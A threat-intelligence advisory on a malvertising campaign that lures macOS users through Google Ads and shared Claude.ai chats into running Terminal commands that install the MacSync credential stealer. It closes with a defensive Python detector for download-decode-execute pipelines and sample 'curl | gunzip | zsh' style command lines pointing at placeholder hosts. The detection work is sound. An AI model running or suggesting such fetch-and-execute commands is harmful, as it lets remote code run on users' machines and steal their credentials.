Malvertising Campaign Targets macOS Users via Google Ads and Claude.ai Chats
Severity: High (Score: 67.5)
Sources: www.virustotal.com, Bleepingcomputer, Gbhackers, Letsdatascience
Summary
A malvertising campaign has been identified that exploits Google Ads and Claude.ai shared chats to deliver malware to macOS users. Security researcher Berk Albayrak reported on May 10, 2026, that attackers are using Google Ads to direct users searching for 'Claude mac download' to malicious instructions disguised as an official installation guide. These instructions prompt users to execute Terminal commands that download and run a compressed in-memory loader script. The malware variant identified is linked to MacSync and is capable of harvesting sensitive information such as browser credentials and macOS Keychain contents. The campaign employs social engineering tactics to increase its credibility by using legitimate platforms. Multiple domains have been used to host the malicious payloads, which evade detection through obfuscation and behavioral checks. The campaign's impact is currently under investigation, with reports confirming its active status.
Key Points
- Attackers exploit Google Ads and Claude.ai chats to deliver macOS malware.
- Malware installation is disguised as an official 'Claude Code on Mac' guide.
- The campaign uses obfuscation techniques to evade detection and target specific users.
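A defender-side heuristic for the behaviour the summary describes, added here as an example and not taken from the researcher's report or the listed sources: it flags process command lines in which a download is piped through a decode or decompress step into a shell or osascript. The campaign's actual commands are not on this page, so the sample lines, the example.invalid hosts and the tool sets (base64 and zcat included) are constructed assumptions.

```python
import re

# Tool sets are assumptions: the page names gunzip and osascript; the rest
# are common companions. Arguments are not inspected.
DOWNLOADERS = {"curl", "wget"}
DECODERS = {"gunzip", "zcat", "base64"}
INTERPRETERS = {"sh", "bash", "zsh", "osascript"}
SUBST = re.compile(r"\$\(([^()]*)\)")  # un-nested $(...) substitution

def _stages(cmdline):
    """Command name (basename) of each '|'-separated pipeline stage."""
    parts = (p.split() for p in cmdline.split("|"))
    return [t[0].rsplit("/", 1)[-1] for t in parts if t]

def _verdict(chain):
    """Downloader later followed by an interpreter; note any decoder between."""
    for i, name in enumerate(chain):
        if name not in DOWNLOADERS:
            continue
        rest = chain[i + 1:]
        for j, later in enumerate(rest):
            if later in INTERPRETERS:
                decoded = any(n in DECODERS for n in rest[:j])
                return "fetch-decode-exec" if decoded else "fetch-exec"
    return None

def classify(cmdline):
    """Return 'fetch-decode-exec', 'fetch-exec' or None for one command line."""
    chains = [_stages(cmdline)]
    for m in SUBST.finditer(cmdline):
        # The command holding $(...) consumes its output: zsh -c "$(curl ...)"
        consumer = _stages(cmdline[:m.start()])[-1:]
        chains.append(_stages(m.group(1)) + consumer)
    verdicts = [v for v in map(_verdict, chains) if v]
    if "fetch-decode-exec" in verdicts:
        return "fetch-decode-exec"
    return verdicts[0] if verdicts else None

# Constructed process command lines, not taken from the campaign.
SAMPLE = [
    "curl -fsSL https://dl.example.invalid/i | gunzip | zsh",
    '/bin/zsh -c "$(curl -fsSL https://dl.example.invalid/i | base64 -D | gunzip)"',
    "curl -fsSL https://example.invalid/install.sh | sh",
    "curl -fsSLO https://example.invalid/tool.tar.gz",
    "gunzip -c backup.sql.gz | psql mydb",
    "osascript -e 'display notification \"done\"'",
]

def scan(lines):
    return [(v, l) for l in lines if (v := classify(l))]
```

Plain `fetch-exec` also matches ordinary install one-liners, so triage on the `fetch-decode-exec` verdict first and treat the other as context.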
Key Entities
- Malware (attack_type)
- CWE-200 - Exposure of Sensitive Information (cwe)
- CWE-601 - Open Redirect (cwe)
- claude.ai (domain)
- MacSync (malware)
- T1003 - OS Credential Dumping (mitre_attack)
- T1027 - Obfuscated Files or Information (mitre_attack)
- T1041 - Exfiltration Over C2 Channel (mitre_attack)
- T1059.004 - Unix Shell (mitre_attack)
- T1059.005 - Visual Basic (mitre_attack)
- Anthropic Claude (platform)
- Google Ads (platform)
- macOS (platform)
- gunzip (tool)
- osascript (tool)
- Terminal (tool)